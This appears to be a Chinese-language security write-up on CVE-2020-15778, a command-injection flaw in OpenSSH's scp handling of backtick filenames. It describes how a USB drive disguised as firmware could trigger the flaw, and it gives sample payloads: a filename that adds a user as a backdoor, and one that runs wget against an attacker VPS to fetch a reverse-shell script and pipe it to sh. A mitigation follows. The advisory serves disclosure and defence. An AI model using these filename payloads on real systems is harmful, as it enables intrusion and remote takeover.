在众多的工业路由器和部分控制器内,采用了OpenSSH来做外部连接和管理。2020年7月9日被国外安全研究员ChinmayPandya发现OpenSSH 8.3 p1及之前版本中SCP命令里存在命令注入漏洞。
上面为https://github.com/openssh/openssh-portable/blob/master/scp.c的代码,989行则是漏洞触发所在。当将文件复制到远程服务器时,文件路径附加在本地scp命令的末尾。例如,如果执行以下命令:
scp SourceFileuser@host:directory/TargetFile
它将执行一个本地命令:
scp-t directory/TargetFile
在创建本地scp命令时,它没有清理文件名。攻击者可以采用反引号(`)文件作为命令注入。而linux系统是可以接受以反引号(`)为文件命名方式。如果你尝试把payload放在反引号中作为文件名,当调用scp命令时就会触发这个指令的执行。
漏洞利用场景:
攻击者可以采用U盘伪装成设备固件或者某种工具,在U盘中创建深度子目录,某一个目录中一个文件可以命名为`payload`,比如`reboot`。当受害者拷贝U盘目录及文件的时候采用scp -r \文件夹 RemoteIP:\文件夹 这条命令的时候,就会触发受害者的机器重启,同理如果你采用反引号+useradd这样的文件名,就可以直接在受害者机器上开启后门。当然变态一点的红队利用,就是在VPS上假设FTP放入反弹shell脚本,然后利用反引号(`)结合wget http:// vps:port/xxx.sh | sh ./xxx.sh 作为文件名,触发受害者反弹shell到VPS上。
对于远程命令的执行,还是需要bypass authorized_keys,所以远程被利用几率比较小。以下这段PoC视频,只是给大家演示一下,是可以存在远程执行命令的可能性,但是前提是要bypass authorized_keys否则,你还是需要知道
password的。
防护解决方案:
截止到现在openssh的github并没有修补这个漏洞,禁用scp -r 整体目录拷贝方式,采用tar压缩目录为单一文件后,scp上传到远端机器后,再ssh远端机器解压目录。
参考:https://github.com/cpandya2909/CVE-2020-15778